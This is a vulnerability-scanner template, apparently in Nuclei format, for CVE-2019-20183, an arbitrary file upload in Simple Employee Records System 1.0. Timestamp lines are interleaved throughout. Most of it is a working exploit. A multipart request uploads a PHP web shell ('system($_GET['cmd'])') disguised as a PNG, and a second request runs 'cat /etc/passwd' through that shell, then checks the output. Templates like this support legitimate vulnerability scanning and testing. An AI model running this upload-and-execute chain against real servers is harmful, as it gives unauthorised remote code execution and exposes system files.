2021-09-30 16:52:05 +00:00
id : CVE-2019-20183
2021-03-01 11:40:03 +00:00
info :
2021-09-30 16:52:05 +00:00
name : Simple Employee Records System 1.0 arbitrary file upload
2021-03-01 11:40:03 +00:00
author : pikpikcu
2021-09-30 16:52:05 +00:00
severity : high
2022-04-22 10:38:41 +00:00
description : Simple Employee Records System 1.0 contains an arbitrary file upload due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or RCE.
reference :
- https://www.exploit-db.com/exploits/49596
2021-09-30 16:52:05 +00:00
classification :
2021-09-30 16:53:23 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
2021-09-30 16:52:05 +00:00
cvss-score : 7.2
cve-id : CVE-2019-20183
2022-04-22 10:38:41 +00:00
cwe-id : CWE-434
2021-09-30 16:52:05 +00:00
tags : rce,intrusive,cve,upload,cve2019
2021-03-01 11:40:03 +00:00
requests :
- raw :
- |
POST /dashboard/uploadID.php HTTP/1.1
Host : {{Hostname}}
Accept : application/json, text/javascript, */*; q=0.01
2021-09-09 06:36:24 +00:00
X-Requested-With : XMLHttpRequest
2021-03-01 11:40:03 +00:00
Content-Type : multipart/form-data; boundary=---------------------------5825462663702204104870787337
-----------------------------5825462663702204104870787337
Content-Disposition : form-data; name="employee_ID"; filename="poc.php"
Content-Type : image/png
<?php
$cmd=$_GET['cmd'];
system($cmd);
? >
-----------------------------5825462663702204104870787337 --
2021-09-08 12:17:19 +00:00
2021-03-01 11:40:03 +00:00
- |
GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1
Host : {{Hostname}}
extractors :
- type : regex
name : endpoint
part : body
internal : true
regex :
- '(?:[a-zA-Z0-9+\/])*_poc.php'
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-03-01 11:40:03 +00:00
condition : and
part : body